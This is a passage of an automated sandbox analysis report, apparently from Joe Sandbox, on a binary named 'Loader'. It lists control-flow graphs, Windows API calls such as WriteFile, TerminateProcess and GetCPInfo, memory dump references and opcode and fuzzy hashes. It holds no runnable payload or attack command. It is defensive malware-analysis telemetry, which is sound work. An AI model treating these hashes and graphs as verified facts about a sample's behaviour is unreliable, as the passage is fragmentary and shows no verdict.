                                                                                                  • Opcode ID: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
                                                                                                  • Instruction ID: bbaaff3146b4feda22f8e542c91b294fc88216cd22da5267659f7f4bb490dbdd
                                                                                                  • Opcode Fuzzy Hash: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
                                                                                                  • Instruction Fuzzy Hash: 5941E2B4901309DFCB04DFA9D99869EBBF0FF48304F108419E858AB350D775AA84CFA1

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00D3F1A0,?,00D3F355,00000000,?,?,00D3F1A0,00DC7F77,?,00D3F1A0), ref: 00D3F2A4
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00D3F355,00000000,?,?,00D3F1A0,00DC7F77,?,00D3F1A0), ref: 00D3F2AB
                                                                                                  • ExitProcess.KERNEL32 ref: 00D3F2BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 46885d46980ac885b70897950fea6915360a8ec60c2eb9e8ade476398ac9d6e5
                                                                                                  • Instruction ID: 89f71cc4be505f0f0b01592890a01f0c2e8de7df77a250206efe86d89299a6fa
                                                                                                  • Opcode Fuzzy Hash: 46885d46980ac885b70897950fea6915360a8ec60c2eb9e8ade476398ac9d6e5
                                                                                                  • Instruction Fuzzy Hash: C4D06736400308ABCF053F60DC0995A3F69EF44352B544425BD0596131CF719A519AB4

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 157 d4d3a4-d4d3c6 158 d4d3cc-d4d3ce 157->158 159 d4d5b9 157->159 161 d4d3d0-d4d3ef call d41ba8 158->161 162 d4d3fa-d4d41d 158->162 160 d4d5bb-d4d5bf 159->160 170 d4d3f2-d4d3f5 161->170 163 d4d423-d4d429 162->163 164 d4d41f-d4d421 162->164 163->161 166 d4d42b-d4d43c 163->166 164->163 164->166 168 d4d43e-d4d44c call d4c152 166->168 169 d4d44f-d4d45f call d4d6d1 166->169 168->169 175 d4d461-d4d467 169->175 176 d4d4a8-d4d4ba 169->176 170->160 179 d4d490-d4d4a6 call d4d74e 175->179 180 d4d469-d4d46c 175->180 177 d4d511-d4d531 WriteFile 176->177 178 d4d4bc-d4d4c2 176->178 181 d4d533-d4d539 GetLastError 177->181 182 d4d53c 177->182 184 d4d4c4-d4d4c7 178->184 185 d4d4fd-d4d50a call d4db7d 178->185 196 d4d489-d4d48b 179->196 186 d4d477-d4d486 call d4db15 180->186 187 d4d46e-d4d471 180->187 181->182 189 d4d53f-d4d54a 182->189 190 d4d4e9-d4d4fb call d4dd41 184->190 191 d4d4c9-d4d4cc 184->191 195 d4d50f 185->195 186->196 187->186 192 d4d551-d4d554 187->192 197 d4d5b4-d4d5b7 189->197 198 d4d54c-d4d54f 189->198 203 d4d4e4-d4d4e7 190->203 199 d4d557-d4d559 191->199 200 d4d4d2-d4d4df call d4dc58 191->200 192->199 195->203 196->189 197->160 198->192 204 d4d587-d4d593 199->204 205 d4d55b-d4d560 199->205 200->203 203->196 210 d4d595-d4d59b 204->210 211 d4d59d-d4d5af 204->211 208 d4d562-d4d574 205->208 209 d4d579-d4d582 call d413a0 205->209 208->170 209->170 210->159 210->211 211->170
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4D74E: GetConsoleOutputCP.KERNEL32(00DC7F77,00000000,00000000,?), ref: 00D4D7B1
                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D3D832,?,00D3DA94), ref: 00D4D529
                                                                                                  • GetLastError.KERNEL32(?,00D3D832,?,00D3DA94,?,00D3DA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00D4D533
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2915228174-0
                                                                                                  • Opcode ID: 5b82acec63aedeedda3033eb6f685451a9cf1b8dc17fd30296ad2e0b63565c3c
                                                                                                  • Instruction ID: a2c8c1d967c44e73c2fd64b31afe1ad52ebf72c8395c325ebcf33c7a2a9e2316
                                                                                                  • Opcode Fuzzy Hash: 5b82acec63aedeedda3033eb6f685451a9cf1b8dc17fd30296ad2e0b63565c3c
                                                                                                  • Instruction Fuzzy Hash: E761A5B1D04119AFDF11DFA8C884AFEBBBAEF4A308F180149E944A7256D771D901CB71

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 214 d472a8-d472d0 call d474ad 217 d47495-d47496 call d4751e 214->217 218 d472d6-d472dc 214->218 223 d4749b-d4749d 217->223 219 d472df-d472e5 218->219 221 d473e1-d47400 call d3c690 219->221 222 d472eb-d472f7 219->222 233 d47403-d47408 221->233 222->219 225 d472f9-d472ff 222->225 224 d4749e-d474ac call d371d1 223->224 228 d47305-d47311 IsValidCodePage 225->228 229 d473d9-d473dc 225->229 228->229 232 d47317-d4731e 228->232 229->224 234 d47340-d4734d GetCPInfo 232->234 235 d47320-d4732c 232->235 236 d47445-d4744f 233->236 237 d4740a-d4740f 233->237 240 d473cd-d473d3 234->240 241 d4734f-d4736e call d3c690 234->241 239 d47330-d4733b 235->239 236->233 238 d47451-d4747b call d477f9 236->238 242 d47411-d47419 237->242 243 d47442 237->243 254 d4747c-d4748b 238->254 247 d4748d-d4748e call d47837 239->247 240->217 240->229 241->239 256 d47370-d47377 241->256 244 d4743a-d47440 242->244 245 d4741b-d4741e 242->245 243->236 244->237 244->243 249 d47420-d47426 245->249 255 d47493 247->255 249->244 253 d47428-d47438 249->253 253->244 253->249 254->247 254->254 255->223 257 d473a3-d473a6 256->257 258 d47379-d4737e 256->258 259 d473ab-d473b2 257->259 258->257 260 d47380-d47388 258->260 259->259 263 d473b4-d473c8 call d477f9 259->263 261 d4738a-d47391 260->261 262 d4739b-d473a1 260->262 264 d47392-d47399 261->264 262->257 262->258 263->239 264->262 264->264
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D474AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00D474D8
                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00D476B8,?,00000000,?,?,?), ref: 00D47309
                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D476B8,?,00000000,?,?,?), ref: 00D47345
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CodeInfoPageValid
                                                                                                  • String ID:
                                                                                                  • API String ID: 546120528-0
                                                                                                  • Opcode ID: 0e0832de8687e93494db10365d0c96ce1025ed0c74974f690d973b71bd7cb1f7
                                                                                                  • Instruction ID: d27867159850e9a234f951731426cd8de5c8081e2f88ede937af66a9e2c5d991
                                                                                                  • Opcode Fuzzy Hash: 0e0832de8687e93494db10365d0c96ce1025ed0c74974f690d973b71bd7cb1f7
                                                                                                  • Instruction Fuzzy Hash: E4513370A083459FDB20CF35C8856BABBF5EF84304F18846ED49ACB251E7759945DBB0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 267 d4db7d-d4dbd2 call d3a050 270 d4dbd4 267->270 271 d4dc47-d4dc57 call d371d1 267->271 273 d4dbda 270->273 275 d4dbe0-d4dbe2 273->275 276 d4dbe4-d4dbe9 275->276 277 d4dbfc-d4dc21 WriteFile 275->277 278 d4dbf2-d4dbfa 276->278 279 d4dbeb-d4dbf1 276->279 280 d4dc23-d4dc2e 277->280 281 d4dc3f-d4dc45 GetLastError 277->281 278->275 278->277 279->278 280->271 282 d4dc30-d4dc3b 280->282 281->271 282->273 283 d4dc3d 282->283 283->271
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D4D50F,?,00D3DA94,?,?,?,00000000), ref: 00D4DC19
                                                                                                  • GetLastError.KERNEL32(?,00D4D50F,?,00D3DA94,?,?,?,00000000,?,?,?,?,?,00D3D832,?,00D3DA94), ref: 00D4DC3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 442123175-0
                                                                                                  • Opcode ID: 054fd41fdf2dc7446a651c373d937b0a4fa9d6a2025cda28175ddc003763c680
                                                                                                  • Instruction ID: 6d144dc288dbe975c0b9bdef6f4e2d79b78ddc0c0a375b09388cb3092767c805
                                                                                                  • Opcode Fuzzy Hash: 054fd41fdf2dc7446a651c373d937b0a4fa9d6a2025cda28175ddc003763c680
                                                                                                  • Instruction Fuzzy Hash: 21216D71A002199FCB19CF29DC90AE9B7FAEB8C305F1441A9E946D7251D630DE82CF74

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 284 d47192-d47197 285 d47199-d471b1 284->285 286 d471b3-d471b7 285->286 287 d471bf-d471c8 285->287 286->287 288 d471b9-d471bd 286->288 289 d471da 287->289 290 d471ca-d471cd 287->290 291 d47234-d47238 288->291 294 d471dc-d471e9 GetStdHandle 289->294 292 d471d6-d471d8 290->292 293 d471cf-d471d4 290->293 291->285 295 d4723e-d47241 291->295 292->294 293->294 296 d47216-d47228 294->296 297 d471eb-d471ed 294->297 296->291 298 d4722a-d4722d 296->298 297->296 299 d471ef-d471f8 GetFileType 297->299 298->291 299->296 300 d471fa-d47203 299->300 301 d47205-d47209 300->301 302 d4720b-d4720e 300->302 301->291 302->291 303 d47210-d47214 302->303 303->291
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00D47081,00D5FCD8,0000000C), ref: 00D471DE
                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00D47081,00D5FCD8,0000000C), ref: 00D471F0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3000768030-0
                                                                                                  • Opcode ID: acae383bfe3ef804deb5575cd165606986d992f0e0d21049acc72d3dc1323457
                                                                                                  • Instruction ID: d6bf97572f6b71ca46bd674f841af3c066e597c615ecccc0afb8e8816c695cf5
                                                                                                  • Opcode Fuzzy Hash: acae383bfe3ef804deb5575cd165606986d992f0e0d21049acc72d3dc1323457
                                                                                                  • Instruction Fuzzy Hash: 6811D67150CB814BC7308E7E8CC86227A95A796370B3C0759E4B6C65F1C770D946D6B5

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32 ref: 00D32038
                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00D32058
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Module$FileHandleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 4146042529-0
                                                                                                  • Opcode ID: 665c57f0ed5019c0e1739e05369413bf820301b9bea12ec1e29815c464ff4db5
                                                                                                  • Instruction ID: 458544c112529a1550ede13d4cadc22f5df339a2ae9816ce8a9ebaf00707ebb2
                                                                                                  • Opcode Fuzzy Hash: 665c57f0ed5019c0e1739e05369413bf820301b9bea12ec1e29815c464ff4db5
                                                                                                  • Instruction Fuzzy Hash: 71011AB19043088FD714EF68D54529EBBF8EB48300F4044ADE889C3341EB705A888FA2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 311 d464f3-d46502 call d46862 314 d46504-d46529 LCMapStringEx 311->314 315 d4652b-d46545 call d4658f LCMapStringW 311->315 319 d4654b-d4654d 314->319 315->319
                                                                                                  APIs
                                                                                                  • LCMapStringEx.KERNELBASE(?,00D46F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00D46527
                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00D46F1A,?,?,-00000008,?,00000000), ref: 00D46545
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String
                                                                                                  • String ID:
                                                                                                  • API String ID: 2568140703-0
                                                                                                  • Opcode ID: 75d90d8d5bddade0255d953fb99a4eadf013cbe31c32781f7df124eaed520b09
                                                                                                  • Instruction ID: 24ee059a506714b6818850c56bd69d6b0ecc188e7ad927e8a6f5bb94982ef8e1
                                                                                                  • Opcode Fuzzy Hash: 75d90d8d5bddade0255d953fb99a4eadf013cbe31c32781f7df124eaed520b09
                                                                                                  • Instruction Fuzzy Hash: 3FF0683240021ABBCF126F90DC159DE3F26EB497A0F098510FA1965120C732CA31ABA2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 320 d456b7-d456c0 321 d456c2-d456d5 RtlFreeHeap 320->321 322 d456ef-d456f0 320->322 321->322 323 d456d7-d456ee GetLastError call d4135d call d41314 321->323 323->322
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00D49A64,?,00000000,?,?,00D49704,?,00000007,?,?,00D4A04A,?,?), ref: 00D456CD
                                                                                                  • GetLastError.KERNEL32(?,?,00D49A64,?,00000000,?,?,00D49704,?,00000007,?,?,00D4A04A,?,?), ref: 00D456D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
                                                                                                  • Opcode ID: 02b371f9fb01d944d1fc0871bd480c7c08ce1813776201bd98830383b906f36d
                                                                                                  • Instruction ID: b7d79c6affea71d4940b8857d1ae475b11553eb17f53dbed75e3a3f380740f82
                                                                                                  • Opcode Fuzzy Hash: 02b371f9fb01d944d1fc0871bd480c7c08ce1813776201bd98830383b906f36d
                                                                                                  • Instruction Fuzzy Hash: E2E08C36100714ABCB152FA4FC0CB897B98DF40752F190024FA0CC6261CB7099A0CBB4

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 328 d314c0-d3152f call d43330 call d33070 333 d31560-d3156a 328->333 334 d31535-d31555 call d33070 328->334 336 d31597-d315be call d33090 call d331a0 333->336 341 d3155b 334->341 342 d3156f-d31592 call d33070 334->342 347 d315d2-d3162c call d33370 call d331c0 call d333a0 call d33410 336->347 348 d315c4-d315cd 336->348 341->333 342->336 364 d31632 347->364 365 d316e1 347->365 349 d318b5-d31903 call d335f0 call d33640 348->349 366 d31637-d31643 364->366 367 d316e6-d316ef 365->367 368 d31649-d316b1 call d33450 call d33520 call d33470 call d33540 call d33430 366->368 369 d316dc 366->369 370 d31707-d3170c 367->370 371 d316f5-d31704 367->371 413 d316b7-d316d7 368->413 414 d316bc-d316c5 368->414 369->365 373 d31712-d317c0 370->373 374 d31717-d3175c call d33450 call d33550 call d33470 370->374 371->370 378 d31891-d318b0 call d335a0 373->378 379 d317c6 373->379 400 d31761-d3178d call d33540 call d33430 374->400 378->349 394 d31835-d3183c 378->394 382 d317cb-d317d7 379->382 386 d317dd-d31820 call d33450 call d33520 call d33470 382->386 387 d3188c 382->387 386->394 415 d31841-d31861 call d33540 call d33430 386->415 387->378 394->349 419 d31793 400->419 420 d31798-d3179e 400->420 413->366 414->369 425 d31867-d31887 415->425 426 d3186c-d31875 415->426 422 d317a1-d317b7 419->422 420->422 422->367 425->382 426->387
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 4218353326-0
                                                                                                  • Opcode ID: 93648c1b61dbf97bca4fa915a0f74aec539eea701142537b1118d1f1205faab2
                                                                                                  • Instruction ID: 723f3174889cf175641e44827eda8a17ea3e2000e52854bf09ed7b2df77c30c1
                                                                                                  • Opcode Fuzzy Hash: 93648c1b61dbf97bca4fa915a0f74aec539eea701142537b1118d1f1205faab2
                                                                                                  • Instruction Fuzzy Hash: 6CD1D278604B418FC724DF29C695A66BBE0FF48714F148A2DE8D78BBA1D734E904CB61
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(00000083,?,00000005,00D476B8,?), ref: 00D47869
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 1807457897-0
                                                                                                  • Opcode ID: 81b7a1915e39145df658260ddf774f7f37822fd205e3cdb4ee4d0aee05fefeae
                                                                                                  • Instruction ID: 0a8fb240dc5d9f6e700920bcdabdb174979136dac6d37af9812309915860d653
                                                                                                  • Opcode Fuzzy Hash: 81b7a1915e39145df658260ddf774f7f37822fd205e3cdb4ee4d0aee05fefeae
                                                                                                  • Instruction Fuzzy Hash: 755149B190C159AFDB118A28CD84BE9BBADFF16304F1801E9E489D7142D335AD85DFB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9d072c6efa848ce6e94f19d9ecbe6a966f1624453d6bdad5056e1ef9e0b3224d
                                                                                                  • Instruction ID: 26ea35e8cbf4bef82afb499a3a2aa107bf50cd303f5ef3c0f8d94b4f0bd507f6
                                                                                                  • Opcode Fuzzy Hash: 9d072c6efa848ce6e94f19d9ecbe6a966f1624453d6bdad5056e1ef9e0b3224d
                                                                                                  • Instruction Fuzzy Hash: 85414C71A0061AABCB14DE68C8919EDB7B9FF08310F580169F545E7640EB31E945EBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f4c0a5dff7770f7f8bb73b9497b94104609ac7afec32d409e65ef4d33b49ae7
                                                                                                  • Instruction ID: b8cd892a31044e209f574cc18a73784503c163bb6730145f914c2978691c9bbc
